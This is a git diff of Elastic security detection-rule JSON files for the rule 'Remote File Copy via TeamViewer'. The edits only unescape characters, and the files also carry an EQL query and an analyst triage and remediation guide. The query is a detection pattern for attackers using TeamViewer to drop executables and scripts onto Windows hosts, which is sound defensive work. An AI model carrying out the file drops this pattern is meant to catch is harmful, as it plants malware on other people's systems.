diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json
index f0d484fabeb..cc95e9439a7 100644
--- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_107.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Remote File Copy via TeamViewer",
- "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json index ecb1e09b1af..13cd2c00a5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json 
+++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_108.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json index bcd09da45eb..058b9c1b53e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_109.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", "references": [ "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json index c6420a2b9aa..ae02465c02f 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
